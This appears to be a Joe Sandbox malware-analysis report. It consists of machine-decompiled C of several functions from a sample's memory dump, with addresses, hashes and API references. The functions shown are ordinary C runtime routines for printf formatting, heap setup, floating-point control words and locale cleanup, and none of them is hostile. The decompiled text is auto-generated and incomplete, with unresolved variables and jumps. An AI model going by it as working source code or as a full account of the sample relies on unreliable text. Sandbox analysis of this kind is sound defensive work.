														E013B4C5A(_t117 + 0x448,  &_v8, _t95, _t91);
														_t97 =  *(_t117 + 0x20);
														_t66 = _t97 >> 3;
														__eflags = _t66 & 0x00000001;
														if((_t66 & 0x00000001) != 0) {
															_t99 = _t97 >> 2;
															__eflags = _t99 & 0x00000001;
															if((_t99 & 0x00000001) == 0) {
																E013B3BFC(_t117 + 0x448, 0x30, _t114, _t91);
																_t120 = _t120 + 0x10;
															}
														}
														E013B4BB5(_t117, 0);
														__eflags =  *_t91;
														if( *_t91 >= 0) {
															_t69 =  *(_t117 + 0x20) >> 2;
															__eflags = _t69 & 0x00000001;
															if((_t69 & 0x00000001) != 0) {
																E013B3BFC(_t117 + 0x448, 0x20, _t114, _t91);
															}
														}
														goto L70;
													}
													__eflags = _t110 - 0x41;
													if(_t110 == 0x41) {
														goto L59;
													}
													goto L60;
												}
												__eflags = _t59;
												if(_t59 == 0) {
													goto L61;
												}
												goto L56;
											}
											__eflags = _t110 - 0x41;
											if(_t110 == 0x41) {
												goto L53;
											}
											_t59 = 0;
											goto L54;
										}
										_t90 = 1;
										goto L50;
									}
									__eflags = _t110 - 0x58;
									if(_t110 != 0x58) {
										goto L49;
									}
									goto L47;
								}
								_t76 = _t89 >> 6;
								__eflags = 1 & _t76;
								if((1 & _t76) == 0) {
									__eflags = 1 & _t89;
									if((1 & _t89) == 0) {
										_t78 = _t89 >> 1;
										__eflags = 1 & _t78;
										if((1 & _t78) != 0) {
											_v8 = 0x20;
											_t95 = 1;
											_v12 = 1;
										}
										goto L45;
									}
									_v8 = 0x2b;
									L42:
									_t95 = 1;
									_v12 = 1;
									goto L45;
								}
								_v8 = 0x2d;
								goto L42;
							}
							L11:
							_t54 = 0;
							goto L71;
						}
						_t80 = _t52;
						__eflags = _t80;
						if(__eflags == 0) {
							L28:
							_push(0);
							_push(0xa);
							L29:
							_t53 = E013B486A(_t117, _t107, __eflags);
							goto L10;
						}
						__eflags = _t80 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t53 = E013B4A4E(__ecx);
						goto L10;
					}
					__eflags = _t51 - 0x67;
					if(_t51 <= 0x67) {
						L30:
						_t53 = E013B4686(0, _t117);
						goto L10;
					}
					__eflags = _t51 - 0x69;
					if(_t51 == 0x69) {
						L27:
						_t2 = _t117 + 0x20;
						 *_t2 =  *(_t117 + 0x20) | 0x00000010;
						__eflags =  *_t2;
						goto L28;
					}
					__eflags = _t51 - 0x6e;
					if(_t51 == 0x6e) {
						_t53 = E013B49BB(__ecx, _t107);
						goto L10;
					}
					__eflags = _t51 - 0x6f;
					if(_t51 != 0x6f) {
						goto L11;
					}
					_t53 = E013B4A2F(__ecx);
					goto L10;
				}
				if(_t122 == 0) {
					goto L27;
				}
				_t123 = _t51 - _t93;
				if(_t123 > 0) {
					_t82 = _t51 - 0x5a;
					__eflags = _t82;
					if(_t82 == 0) {
						_t53 = E013B462C(__ecx);
						goto L10;
					}
					_t83 = _t82 - 7;
					__eflags = _t83;
					if(_t83 == 0) {
						goto L30;
					}
					__eflags = _t83;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t53 = E013B47D7(0, _t117, _t107, __eflags, 0);
					goto L10;
				}
				if(_t123 == 0) {
					_push(1);
					goto L13;
				}
				if(_t51 == 0x41) {
					goto L30;
				}
				if(_t51 == 0x43) {
					goto L17;
				}
				if(_t51 <= 0x44) {
					goto L11;
				}
				if(_t51 <= 0x47) {
					goto L30;
				}
				if(_t51 != 0x53) {
					goto L11;
				}
				goto L9;
			}

0x013b4369
0x013b436a
0x013b436d
0x013b4373
0x013b4374
0x013b4378
0x013b437b
0x013b43e9
0x013b43ec
0x013b443b
0x013b443b
0x013b443e
0x013b43aa
0x013b43ac
0x013b43b1
0x013b43b3
0x013b4459
0x013b445c
0x013b4590
0x013b4590
0x013b4592
0x013b4595
0x013b4595
0x013b4462
0x013b4464
0x013b4468
0x013b446d
0x013b4473
0x013b4476
0x013b4479
0x013b447b
0x013b44ac
0x013b44ac
0x013b44af
0x013b44b2
0x013b44b9
0x013b44bb
0x013b44be
0x013b44c0
0x013b44c6
0x013b44c6
0x013b44c6
0x013b44c8
0x013b44c8
0x013b44cb
0x013b44d6
0x013b44d6
0x013b44d8
0x013b44d8
0x013b44da
0x013b44e0
0x013b44e0
0x013b44e5
0x013b44e8
0x013b44f3
0x013b44f5
0x013b44f6
0x013b44f6
0x013b44fa
0x013b44fa
0x013b44fd
0x013b4500
0x013b4504
0x013b450a
0x013b4510
0x013b4512
0x013b4516
0x013b451d
0x013b4522
0x013b4525
0x013b4525
0x013b452b
0x013b4538
0x013b453d
0x013b4542
0x013b4545
0x013b4547
0x013b4549
0x013b454c
0x013b454f
0x013b455c
0x013b4561
0x013b4561
0x013b454f
0x013b4568
0x013b456d
0x013b4570
0x013b4575
0x013b4578
0x013b457a
0x013b4587
0x013b458c
0x013b457a
0x00000000
0x013b458f
0x013b44ea
0x013b44ed
0x00000000
0x00000000
0x00000000
0x013b44ef
0x013b44dc
0x013b44de
0x00000000
0x00000000
0x00000000
0x013b44de
0x013b44cd
0x013b44d0
0x00000000
0x00000000
0x013b44d2
0x00000000
0x013b44d2
0x013b44c2
0x00000000
0x013b44c2
0x013b44b4
0x013b44b7
0x00000000
0x00000000
0x00000000
0x013b44b7
0x013b447f
0x013b4482
0x013b4484
0x013b448c
0x013b448e
0x013b449d
0x013b449f
0x013b44a1
0x013b44a3
0x013b44a7
0x013b44a9
0x013b44a9
0x00000000
0x013b44a1
0x013b4490
0x013b4494
0x013b4494
0x013b4496
0x00000000
0x013b4496
0x013b4486
0x00000000
0x013b4486
0x013b43b9
0x013b43b9
0x00000000
0x013b43b9
0x013b4445
0x013b4445
0x013b4448
0x013b441a
0x013b441a
0x013b441b
0x013b441d
0x013b441f
0x00000000
0x013b441f
0x013b444a
0x013b444d
0x00000000
0x00000000
0x013b4453
0x013b43c2
0x013b43c2
0x00000000
0x013b43c2
0x013b43ee
0x013b4431
0x00000000
0x013b4431
0x013b43f0
0x013b43f3
0x013b4426
0x013b4428
0x00000000
0x013b4428
0x013b43f5
0x013b43f8
0x013b4416
0x013b4416
0x013b4416
0x013b4416
0x00000000
0x013b4416
0x013b43fa
0x013b43fd
0x013b440f
0x00000000
0x013b440f
0x013b43ff
0x013b4402
0x00000000
0x00000000
0x013b4406
0x00000000
0x013b4406
0x013b437d
0x00000000
0x00000000
0x013b4383
0x013b4385
0x013b43c6
0x013b43c6
0x013b43c9
0x013b43e2
0x00000000
0x013b43e2
0x013b43cb
0x013b43cb
0x013b43ce
0x00000000
0x00000000
0x013b43d1
0x013b43d4
0x00000000
0x00000000
0x013b43d6
0x013b43d9
0x00000000
0x013b43d9
0x013b4387
0x013b43c0
0x00000000
0x013b43c0
0x013b438c
0x00000000
0x00000000
0x013b4395
0x00000000
0x00000000
0x013b439a
0x00000000
0x00000000
0x013b439f
0x00000000
0x00000000
0x013b43a8
0x00000000
0x00000000
0x00000000

Strings

0, xrefs: 013B44E0

Memory Dump Source

Source File: 00000000.00000002.243196201.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.243191959.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243319234.00000000013C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243328524.00000000013CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243343625.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243348429.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243362989.00000000013EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_c35d4e641adf21bead54611499c416c8e2de75ac96098.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 5deddc91a61f2ea2aba5cdf2484fdc21fff50436dc7623fb558765420459175e
Instruction ID: b97aca287ab4ee646407a7cdcfac10fa5f47a9b772e63eedab1cca72301accd0
Opcode Fuzzy Hash: 5deddc91a61f2ea2aba5cdf2484fdc21fff50436dc7623fb558765420459175e
Instruction Fuzzy Hash: 7951787060064996EF38C96C88D57FE7BDD9B4220CF08441ADB4BE7E83F619D964835E

Uniqueness

Uniqueness Score: -1.00%

Function 013BAD73 Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E013BAD73() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x13d9cf0 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}

0x013bad73
0x013bad7b
0x013bad83

APIs

GetProcessHeap.KERNEL32 ref: 013BAD73

Memory Dump Source

Source File: 00000000.00000002.243196201.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.243191959.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243319234.00000000013C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243328524.00000000013CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243343625.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243348429.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243362989.00000000013EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_c35d4e641adf21bead54611499c416c8e2de75ac96098.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: e42ab4ba6ff8d903b9c50e9ab0c03ad6d46cf6226d5acefea0dd8c0825747a91
Instruction ID: 8dffa91e9645bdb4b983133b37ff127430ad574c8d584b2322f3aa2b703bcbc5
Opcode Fuzzy Hash: e42ab4ba6ff8d903b9c50e9ab0c03ad6d46cf6226d5acefea0dd8c0825747a91
Instruction Fuzzy Hash: 75A01130202202CFCB20CE32AA083083AECBA00B80B00C028A802C220CEB2080008B00

Uniqueness

Uniqueness Score: -1.00%

Function 013D2F8F Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.243328524.00000000013CA000.00000004.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.243191959.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243196201.00000000013B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243319234.00000000013C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243343625.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243348429.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243362989.00000000013EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_c35d4e641adf21bead54611499c416c8e2de75ac96098.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6de5e848d937083b49f0169d3b41f08eb3f60cdac5fbd5286eae1f109443dba
Instruction ID: d085121410c21c1b1ccf8b9ed8543025654621823e7367ac37d073e7781db6f0
Opcode Fuzzy Hash: a6de5e848d937083b49f0169d3b41f08eb3f60cdac5fbd5286eae1f109443dba
Instruction Fuzzy Hash: 0E41A4B2A00214AFEB04CF69EDC496ABBF8FB08314B048579FE09E7351D6709D008BB4

Uniqueness

Uniqueness Score: -1.00%

Function 013BFDCC Relevance: .1, Instructions: 104
COMMONCrypto

Download Yara Rule

C-Code - Quality: 72%

			E013BFDCC(unsigned int _a4) {
				signed int _v8;
				signed int _v32;
				void _v36;
				signed int _t56;
				signed int _t59;
				unsigned int _t61;
				unsigned int _t63;
				signed int _t70;
				signed int _t81;
				void* _t101;

				_t61 = _a4;
				_t68 = _t61 >> 0x00000010 & 0x0000003f;
				_t70 = 7;
				memset( &_v36, 0, _t70 << 2);
				asm("fnstenv [ebp-0x20]");
				_v32 = _v32 ^ (_v32 ^ ((_t61 >> 0x00000010 & 1) << 0x00000005 | ((_t61 >> 0x00000010 & 0x0000003f) >> 0x00000001 & 1) << 0x00000004 | (_t68 >> 0x00000002 & 1) << 0x00000003 | (_t68 >> 0x00000003 & 1) << 0x00000002 | _t68 >> 0x00000004 & 1 | (_t68 >> 0x00000005 & 1) + (_t68 >> 0x00000005 & 1))) & 0x0000003f;
				asm("fldenv [ebp-0x20]");
				_t63 = _t61 >> 0x00000018 & 0x0000003f;
				_t56 = (_t63 >> 0x00000005 & 1) + (_t63 >> 0x00000005 & 1);
				_t81 = (_t63 & 1) << 0x00000005 | (_t63 >> 0x00000001 & 1) << 0x00000004 | (_t63 >> 0x00000002 & 1) << 0x00000003 | (_t63 >> 0x00000003 & 1) << 0x00000002 | _t63 >> 0x00000004 & 1 | _t56;
				_t101 =  *0x13d9654 - 1; // 0x6
				if(_t101 >= 0) {
					asm("stmxcsr dword [ebp-0x4]");
					_t59 = _v8 & 0xffffffc0 | _t81 & 0x0000003f;
					_v8 = _t59;
					asm("ldmxcsr dword [ebp-0x4]");
					return _t59;
				}
				return _t56;
			}

0x013bfdd7
0x013bfddf
0x013bfe37
0x013bfe38
0x013bfe3a
0x013bfe49
0x013bfe4c
0x013bfe52
0x013bfe9c
0x013bfe9f
0x013bfea1
0x013bfea9
0x013bfeab
0x013bfeb8
0x013bfeba
0x013bfebd
0x00000000
0x013bfebd
0x013bfec2

Memory Dump Source

Source File: 00000000.00000002.243196201.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.243191959.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243319234.00000000013C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243328524.00000000013CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243343625.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243348429.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243362989.00000000013EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_c35d4e641adf21bead54611499c416c8e2de75ac96098.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35a02f6eb586dcdc127c212d5255aa111d526383f6226d89a9e56f44cd41c148
Instruction ID: 7ab50cbcacabb2df76713caeafcab4f3b48ca6df7c87630c7a8eb93c8dd21d7a
Opcode Fuzzy Hash: 35a02f6eb586dcdc127c212d5255aa111d526383f6226d89a9e56f44cd41c148
Instruction Fuzzy Hash: 9321B673F2043947770CC47E8C522BDB6E1C78C611745423AF9A6EA2C1D96CD917E2E4

Uniqueness

Uniqueness Score: -1.00%

Function 013BFCAC Relevance: .1, Instructions: 81
COMMONCrypto

Download Yara Rule

C-Code - Quality: 72%

			E013BFCAC(void* __ecx) {
				signed int _v8;
				signed int _v12;
				unsigned int _t55;
				signed int _t70;
				void* _t72;

				_v8 = 0;
				asm("fnstsw word [ebp-0x4]");
				_t70 = ((_v8 & 0x3f) >> 0x00000001 & 1) << 0x00000005 | ((_v8 & 0x3f) >> 0x00000002 & 1) << 0x00000003 | ((_v8 & 0x3f) >> 0x00000003 & 1) << 0x00000002 | (_t43 >> 0x00000004 & 1) + (_t43 >> 0x00000004 & 1) | (_t43 & 1) << 0x00000004 | _t43 >> 0x00000005;
				_t72 =  *0x13d9654 - 1; // 0x6
				if(_t72 >= 0) {
					asm("stmxcsr dword [ebp-0x8]");
					_t55 = _v12 & 0x0000003f;
				} else {
					_t55 = 0;
				}
				return (((_t55 >> 0x00000001 & 1) << 0x00000005 | (_t55 >> 0x00000002 & 1) << 0x00000003 | (_t55 >> 0x00000003 & 1) << 0x00000002 | (_t55 >> 0x00000004 & 1) + (_t55 >> 0x00000004 & 1) | (_t55 & 1) << 0x00000004 | _t55 >> 0x00000005) << 0x00000008 | _t70) << 0x00000010 | (_t55 >> 0x00000001 & 1) << 0x00000005 | (_t55 >> 0x00000002 & 1) << 0x00000003 | (_t55 >> 0x00000003 & 1) << 0x00000002 | (_t55 >> 0x00000004 & 1) + (_t55 >> 0x00000004 & 1) | (_t55 & 1) << 0x00000004 | _t55 >> 0x00000005 | _t70;
			}

0x013bfcb7
0x013bfcbb
0x013bfd00
0x013bfd02
0x013bfd08
0x013bfd0e
0x013bfd15
0x013bfd0a
0x013bfd0a
0x013bfd0a
0x013bfd63

Memory Dump Source

Source File: 00000000.00000002.243196201.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.243191959.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243319234.00000000013C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243328524.00000000013CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243343625.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243348429.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243362989.00000000013EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_c35d4e641adf21bead54611499c416c8e2de75ac96098.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76a698fbb4b6cd8b10544364e340eeae95dcf22fd168aa1f2c113d15d7dd64d6
Instruction ID: 94f87e992e9d7ab74f7ced450b7952bb826299ef8a107d39bec9e75783615ee2
Opcode Fuzzy Hash: 76a698fbb4b6cd8b10544364e340eeae95dcf22fd168aa1f2c113d15d7dd64d6
Instruction Fuzzy Hash: 6711A723F30C255B675C817D8C172BA91D6DBD815470F533ED826E7284E8A4DE13C290

Uniqueness

Uniqueness Score: -1.00%

Function 013D8C0C Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.243343625.00000000013D8000.00000040.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.243191959.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243196201.00000000013B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243319234.00000000013C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243328524.00000000013CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243348429.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243362989.00000000013EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_c35d4e641adf21bead54611499c416c8e2de75ac96098.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d0bfc2ef7b64e396843138ab717a1f3c293dc8ee292486fa54476fd2f3b6864
Instruction ID: d6f1436765d389f41df0ee6b8dd6def005537dfd4a4aba5c4462c13a4f70ec72
Opcode Fuzzy Hash: 6d0bfc2ef7b64e396843138ab717a1f3c293dc8ee292486fa54476fd2f3b6864
Instruction Fuzzy Hash: 2FE04F33621614DBCB319B5EE880C96F7E8EB946B0B4544A5EA4597A11D230FC02C790

Uniqueness

Uniqueness Score: -1.00%

Function 013BA9E9 Relevance: 19.6, APIs: 13, Instructions: 113
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E013BA9E9(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x13ca720) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E013B67BB(_t46);
							E013BA5A2( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E013B67BB(_t47);
							E013BA6A0( *((intOrPtr*)(_t74 + 0x88)));
						}
						E013B67BB( *((intOrPtr*)(_t74 + 0x7c)));
						E013B67BB( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E013B67BB( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E013B67BB( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E013B67BB( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E013B67BB( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E013BAB5A( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x13ca1f8) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E013B67BB(_t31);
							E013B67BB( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E013B67BB(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E013B67BB(_t74);
			}

0x013ba9f1
0x013ba9f5
0x013ba9fd
0x013baa06
0x013baa0b
0x013baa12
0x013baa1a
0x013baa22
0x013baa2d
0x013baa33
0x013baa34
0x013baa3c
0x013baa44
0x013baa4f
0x013baa55
0x013baa59
0x013baa64
0x013baa6a
0x013baa0b
0x013baa6b
0x013baa73
0x013baa86
0x013baa99
0x013baaa7
0x013baab2
0x013baab7
0x013baac0
0x013baac8
0x013baac9
0x013baacf
0x013baad2
0x013baad5
0x013baadc
0x013baade
0x013baae2
0x013baaea
0x013baaf1
0x013baaf7
0x013baaf8
0x013baaf8
0x013baaff
0x013bab01
0x013bab06
0x013bab0e
0x013bab13
0x013bab14
0x013bab14
0x013bab17
0x013bab1a
0x013bab1d
0x013bab20
0x013bab20
0x013bab30

APIs

___free_lconv_mon.LIBCMT ref: 013BAA2D

Part of subcall function 013BA5A2: _free.LIBCMT ref: 013BA5BF
Part of subcall function 013BA5A2: _free.LIBCMT ref: 013BA5D1
Part of subcall function 013BA5A2: _free.LIBCMT ref: 013BA5E3
Part of subcall function 013BA5A2: _free.LIBCMT ref: 013BA5F5
Part of subcall function 013BA5A2: _free.LIBCMT ref: 013BA607
Part of subcall function 013BA5A2: _free.LIBCMT ref: 013BA619
Part of subcall function 013BA5A2: _free.LIBCMT ref: 013BA62B
Part of subcall function 013BA5A2: _free.LIBCMT ref: 013BA63D
Part of subcall function 013BA5A2: _free.LIBCMT ref: 013BA64F
Part of subcall function 013BA5A2: _free.LIBCMT ref: 013BA661
Part of subcall function 013BA5A2: _free.LIBCMT ref: 013BA673
Part of subcall function 013BA5A2: _free.LIBCMT ref: 013BA685
Part of subcall function 013BA5A2: _free.LIBCMT ref: 013BA697

_free.LIBCMT ref: 013BAA22

Part of subcall function 013B67BB: HeapFree.KERNEL32(00000000,00000000,?,013BA733,?,00000000,?,?,?,013BA75A,?,00000007,?,?,013BAB80,?), ref: 013B67D1
Part of subcall function 013B67BB: GetLastError.KERNEL32(?,?,013BA733,?,00000000,?,?,?,013BA75A,?,00000007,?,?,013BAB80,?,?), ref: 013B67E3

_free.LIBCMT ref: 013BAA44
_free.LIBCMT ref: 013BAA59
_free.LIBCMT ref: 013BAA64
_free.LIBCMT ref: 013BAA86
_free.LIBCMT ref: 013BAA99
_free.LIBCMT ref: 013BAAA7
_free.LIBCMT ref: 013BAAB2
_free.LIBCMT ref: 013BAAEA
_free.LIBCMT ref: 013BAAF1
_free.LIBCMT ref: 013BAB0E
_free.LIBCMT ref: 013BAB26

Memory Dump Source

Source File: 00000000.00000002.243196201.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.243191959.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243319234.00000000013C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243328524.00000000013CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243343625.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243348429.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243362989.00000000013EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_c35d4e641adf21bead54611499c416c8e2de75ac96098.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: bb7cbd980bb59e6a0edadfaf44c5708931fd8d0350d5642c0caa0a83e7d03ac2
Instruction ID: 60b96f473faa551f830c764ddd019d8170a60bc60a5a8d93c03ed9a2138db51a
Opcode Fuzzy Hash: bb7cbd980bb59e6a0edadfaf44c5708931fd8d0350d5642c0caa0a83e7d03ac2
Instruction Fuzzy Hash: 74318171600B029FFB21AA7CDAC6FD677E9AF10618F14481DEA55D7991FF34E9808B20

Uniqueness

Uniqueness Score: -1.00%

Function 013B7A52 Relevance: 15.1, APIs: 10, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E013B7A52(void* __ebx, void* __edi, void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				void* _t67;
				intOrPtr _t68;
				void* _t72;
				void* _t73;

				_t73 = __esi;
				_t72 = __edi;
				_t67 = __ebx;
				_t36 = _a4;
				_t68 =  *_a4;
				_t77 = _t68 - 0x13c40a8;
				if(_t68 != 0x13c40a8) {
					E013B67BB(_t68);
					_t36 = _a4;
				}
				E013B67BB( *((intOrPtr*)(_t36 + 0x3c)));
				E013B67BB( *((intOrPtr*)(_a4 + 0x30)));
				E013B67BB( *((intOrPtr*)(_a4 + 0x34)));
				E013B67BB( *((intOrPtr*)(_a4 + 0x38)));
				E013B67BB( *((intOrPtr*)(_a4 + 0x28)));
				E013B67BB( *((intOrPtr*)(_a4 + 0x2c)));
				E013B67BB( *((intOrPtr*)(_a4 + 0x40)));
				E013B67BB( *((intOrPtr*)(_a4 + 0x44)));
				E013B67BB( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E013B787E(_t67, _t72, _t73, _t77);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E013B78E9(_t67, _t72, _t73, _t77);
			}

0x013b7a52
0x013b7a52
0x013b7a52
0x013b7a57
0x013b7a5d
0x013b7a5f
0x013b7a65
0x013b7a68
0x013b7a6d
0x013b7a70
0x013b7a74
0x013b7a7f
0x013b7a8a
0x013b7a95
0x013b7aa0
0x013b7aab
0x013b7ab6
0x013b7ac1
0x013b7acf
0x013b7ada
0x013b7ae2
0x013b7ae3
0x013b7ae6
0x013b7aec
0x013b7af0
0x013b7af4
0x013b7af5
0x013b7aff
0x013b7b05
0x013b7b06
0x013b7b09
0x013b7b0f
0x013b7b13
0x013b7b17
0x013b7b1e

APIs

_free.LIBCMT ref: 013B7A68

Part of subcall function 013B67BB: HeapFree.KERNEL32(00000000,00000000,?,013BA733,?,00000000,?,?,?,013BA75A,?,00000007,?,?,013BAB80,?), ref: 013B67D1
Part of subcall function 013B67BB: GetLastError.KERNEL32(?,?,013BA733,?,00000000,?,?,?,013BA75A,?,00000007,?,?,013BAB80,?,?), ref: 013B67E3

_free.LIBCMT ref: 013B7A74
_free.LIBCMT ref: 013B7A7F
_free.LIBCMT ref: 013B7A8A
_free.LIBCMT ref: 013B7A95
_free.LIBCMT ref: 013B7AA0
_free.LIBCMT ref: 013B7AAB
_free.LIBCMT ref: 013B7AB6
_free.LIBCMT ref: 013B7AC1
_free.LIBCMT ref: 013B7ACF

Memory Dump Source

Source File: 00000000.00000002.243196201.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.243191959.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243319234.00000000013C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243328524.00000000013CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243343625.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
